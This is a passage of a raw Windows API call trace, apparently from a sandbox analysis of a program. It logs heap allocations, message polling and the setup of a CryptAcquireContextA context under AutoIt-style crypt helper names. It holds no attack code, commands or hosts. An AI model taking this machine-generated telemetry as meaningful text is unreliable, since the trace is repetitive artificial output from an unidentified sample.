hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.623] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0263.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0263.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.623] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.624] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0263.624] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0263.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0263.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0263.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0263.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.626] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0263.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0263.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69be8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0263.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0263.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0263.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.628] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0263.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.629] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0263.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.630] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.630] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0263.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0263.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.630] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.630] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.630] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.631] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.631] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.631] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.631] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.631] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0263.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.632] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0263.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0263.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.632] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.632] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0263.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.632] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0263.632] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0263.632] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0263.632] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0263.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0263.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.632] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0263.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.633] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.633] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0263.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 